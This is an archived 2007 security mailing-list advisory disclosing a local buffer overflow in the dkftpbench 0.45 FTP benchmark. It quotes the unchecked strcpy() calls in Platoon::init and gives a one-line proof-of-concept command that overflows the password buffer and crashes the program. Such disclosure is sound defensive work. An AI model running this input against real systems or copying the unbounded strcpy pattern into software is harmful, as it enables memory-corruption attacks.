vulnwatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[VulnWatch] dkftpbench 0.45 (Platoon:init) Local buffer overflow vulnera

from [starcadi] [Permanent Link][Original]
To: vulnwatch <vulnwatch@vulnwatch.org>
Subject: [VulnWatch] dkftpbench 0.45 (Platoon:init) Local buffer overflow vulnerability
From: starcadi <starcadi@gmail.com>
Date: Mon, 19 Mar 2007 20:33:34 +0100
Delivered-to: sp-com-lists@consult.net
Delivered-to: vulnwatch-list@securepoint.com
Delivered-to: mailing list vulnwatch@vulnwatch.org
Delivered-to: moderator for vulnwatch@vulnwatch.org
Dkim-signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=jTjzHht+mohdw4If3YKcg7WAttzUjq+ZIgey1vUfZa7U23ed7suagwpFlMgJJ9E3jhEK1H0ZLoDw7eFX4wmu+6AteJrs4i9Mp5l3ASysi6qnI6uIHmtsx4nM/Znil4eMTxCsY78y1QoesuOEoLbFt7Ps+7Fjh9xPeFcTQGP8zEU=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=FveEVPMqDxEglgvgGgJY09s6e1FmEWzr1Av3n/ES6dckTFEVw1TK2V5+YxIw+kKXjXQCktNtsfx/k3kR7PpOG2vttP92/7dhx6waso0ugUirs40R3O90G5MT4JVmT3U9ysw6O5W32QdDv+W2OFiEn3SBwxXtXeNI2aHJJvUcjcs=
List-help: <mailto:vulnwatch-help@vulnwatch.org>
List-post: <mailto:vulnwatch@vulnwatch.org>
List-subscribe: <mailto:vulnwatch-subscribe@vulnwatch.org>
List-unsubscribe: <mailto:vulnwatch-unsubscribe@vulnwatch.org>
Mailing-list: contact vulnwatch-help@vulnwatch.org; run by ezmlm 
Description:

dkftpbench is an FTP benchmark program inspired by SPECweb99. The
result of the benchmark is a number-of-simultaneous-users rating;
after running the benchmark properly, you have a good idea how many
simultaneous dialup clients a server can support. The target bandwidth
per client is set at 28.8 kilobits/second to model dialup users; this
is important for servers on the real Internet, which often serve
thousands of clients on only 10 MBits/sec of bandwidth.
Found buffer overflow in Platoon::init function using strcpy() with no
sizelen control.
source: http://www.kegel.com/dkftpbench/

Source error:

in main():
--
int main(int argc, char **argv)
{
        [..]
        const char *arg_username = "anonymous";
        const char *arg_password = "robouser@";

        [..]
                } else if (!strncmp(argv[i], "-u", 2)) {
                        arg_username = &argv[i][2];
                } else if (!strncmp(argv[i], "-p", 2)) {
                        arg_password = &argv[i][2];

        [..]
        Platoon thePlatoon;
        thePlatoon.init(poller, &sked, arg_filename,
                arg_clientBandwidth, arg_minClientBandwidth, arg_mtu,
                arg_hostname, arg_portnum, arg_username, arg_password,
                local_addrs, n_local_addrs);

        [..]
}
--

in Platoon.h:
--
        /// The user name part of the URL to fetch
        char m_username[128];
        /// The password part of the URL to fetch
        char m_passwd[128];
--

in Platoon.c:
--
void Platoon::init(Poller *poller, Sked *sked, const char *filename,
        int maxBytesPerSec, int minBytesPerSec, int bytesPerRead,
        const char *servername, int port,
        const char *username, const char *passwd,
        struct sockaddr_in *local_addrs, int n_local_addrs)
{
        [..]
        m_port = port;
        m_sked = sked;
        strcpy(m_passwd, passwd);
        strcpy(m_servername, servername);
        strcpy(m_username, username);
        m_verbosity = 0;
        m_local_addrs = local_addrs;
        [..]
}
--

Proof of concept:

$ dkftpbench -n1 -hlocalhost -p21 -u test -p`perl -e "print 'A'x135"` -v1
-h127.0.0.1 host name of ftp server
-P21 port number of ftp server
-n1 number of users
-c1 target number of simultaneous connection attempts
-k2 Start next connection when: 1=immediately, 2=after prev connect complete
-t0 length of run (in seconds)
-b3600 desired bandwidth (in bytes per second)
-B2700 min acceptable per-client bandwidth (in bytes per second)
-ufederico user name
-paaaaaa[..]
-fusenet/rec.juggling/juggling.FAQ.Z file to fetch
-m1500 bytes per 'packet'
-v1 verbosity
-sp selector (p=poll, s=select, d=/dev/poll, k=kqueue, r=rtsig, f=sig-per-fd)
-a0 use all local interfaces
Using poll()
Segmentation fault
$

--
.original http://intel.shacknet.nu/
~ starcadi
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
  • [VulnWatch] dkftpbench 0.45 (Platoon:init) Local buffer overflow vulnerability, starcadi <=
Previous by Date:  Conflict of Interest - My summary, Mark Litchfield
Next by Date:  [VulnWatch] cftp 0.12 (readrc) Local buffer overflow vulnerability, starcadi
Previous by Thread:  Conflict of Interest - My summary, Mark Litchfield
Next by Thread:  [VulnWatch] cftp 0.12 (readrc) Local buffer overflow vulnerability, starcadi
Indexes:  [Date] [Thread] [Top] [All Lists]